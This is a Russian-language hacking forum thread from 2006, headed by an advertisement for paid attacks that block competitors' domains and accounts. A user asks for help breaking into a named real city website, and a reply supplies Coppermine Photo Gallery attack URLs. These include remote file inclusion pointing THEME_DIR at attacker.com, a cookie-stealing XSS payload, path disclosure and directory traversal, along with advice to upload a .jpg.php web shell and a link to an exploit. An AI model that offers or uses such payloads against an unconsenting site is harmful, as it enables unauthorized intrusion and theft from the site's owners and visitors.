Форум АНТИЧАТ - Вроде все испробовал =(

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Разное - Покупка, продажа, обмен
Вроде все испробовал =(

Опции темы

Поиск в этой теме

Опции просмотра

Вроде все испробовал =(

06.06.2006, 16:43

[6][P][A][T]

Новичок

Регистрация: 03.06.2006

Сообщений: 6

Провел на форуме:
13782

Репутация: -2

Вроде все испробовал =(

Плиз помогите с поиском уязвимостей на
www.strinfo.ru
Вроде уже все испробовал =(

Зарание примного благодарен =)

17.06.2006, 00:03

KillAll

Познающий

Регистрация: 28.02.2006

Сообщений: 82

Провел на форуме:
205378

Репутация: 34

А платить кто будет?

17.06.2006, 01:22

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

Провел на форуме:
5151669

Репутация: 1198

Отправить сообщение для Sn@k3 с помощью ICQ

думаю е детская защита (

17.06.2006, 11:45

zyl

Познающий

Регистрация: 19.04.2006

Сообщений: 40

Провел на форуме:
2905481

Репутация: 47

Отправить сообщение для zyl с помощью ICQ

Вообщем, попробуй зайти на страницу фотогалерея, там внизу страницы имеется надпись: Powered by Coppermine Photo Gallery. У этого скрипта есть несколько багов вот они:
1 PHP including:

http://localhost/nuke69j1/modules/co..._DIR=http://at tacker.com
http://localhost/nuke72/modules/copp...//attacker.com
http://localhost/nuke72/modules/copp...//attacker.com
http://localhost/nuke72/modules/coppermine/themes/ma ze/theme.php?THEME_DIR=http://attacker.com

2. Раскрытие инсталляционного пути:
http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
ht tp://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/copp...splayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/copp...e/crop.inc.php

3. XSS:
http://localhost/nuke72/modules/copp...php?CPG_URL=fo obar">[xss
code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert( document.cookie);>

4. Просмотр структуры каталогов (удаленный авторизованный пользователь с PHP-Nuke административными привилегиями):
http://localhost/nuke72/modules.php?...w&startdir=../..

Также сообщается, что удаленный авторизованный пользователь с административными привилегиями PHP-Nuke может выполнить произвольные команды оболочки, представляя специально обработанные 'impath' и 'jpeg_qual' параметры конфигурации. Пример см. в источнике сообщения.

Можешь попробывать загрузить файл с расширения .jpg.php, вместо картинки!

Информация предоставлена по данным SecurityLab

Последний раз редактировалось zyl; 17.06.2006 в 22:12..

17.06.2006, 11:50

zyl

Познающий

Регистрация: 19.04.2006

Сообщений: 40

Провел на форуме:
2905481

Репутация: 47

Но правда это на локальной машине, можеть залить скрипт с офицального сайта и сам что-нибудь обнаружить. Вот там форум вроде от PHP Nuke, тобишь phpBB 2.x.x., но за последнее не ручаюсь!

17.06.2006, 22:22

zyl

Познающий

Регистрация: 19.04.2006

Сообщений: 40

Провел на форуме:
2905481

Репутация: 47

Вот я тебе эксплоит подыскал:
_http://www.securitylab.ru/poc/extra/222633.php?phrase_id=66579
Хотя вряд ли он заработает, он для старой версии(07 января, 2003)!

18.06.2006, 01:30

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

Провел на форуме:
5151669

Репутация: 1198

zyl, что ты тут выложил может и не работать, так как это всё на необъезжанных дфигах, т.е. только что устнавленных, а если админ руку приложил

18.06.2006, 11:38

zyl

Познающий

Регистрация: 19.04.2006

Сообщений: 40

Провел на форуме:
2905481

Репутация: 47

Ну насчёт эксплоита ты наверное прав! Это же ведь городская страничка и вряд ли админ что-нибудь своего не прилепит или заплатки не поставит! А все баги это же локалка, опять вряд ли обычный пользователь будет иметь права на серьёзные вещи.
Хотя я зря так "старался" автор темы уже наверное забыл, что оставлял сообщение!

Последний раз редактировалось zyl; 18.06.2006 в 11:46..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Открытое письмо журналу "Хакер"	TheFile	Болталка	34	31.01.2009 21:03
Как стать хакером!	foreva	Болталка	19	12.12.2007 00:12
Ошибки Windows	dinar_007	Windows	19	01.07.2007 13:32

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход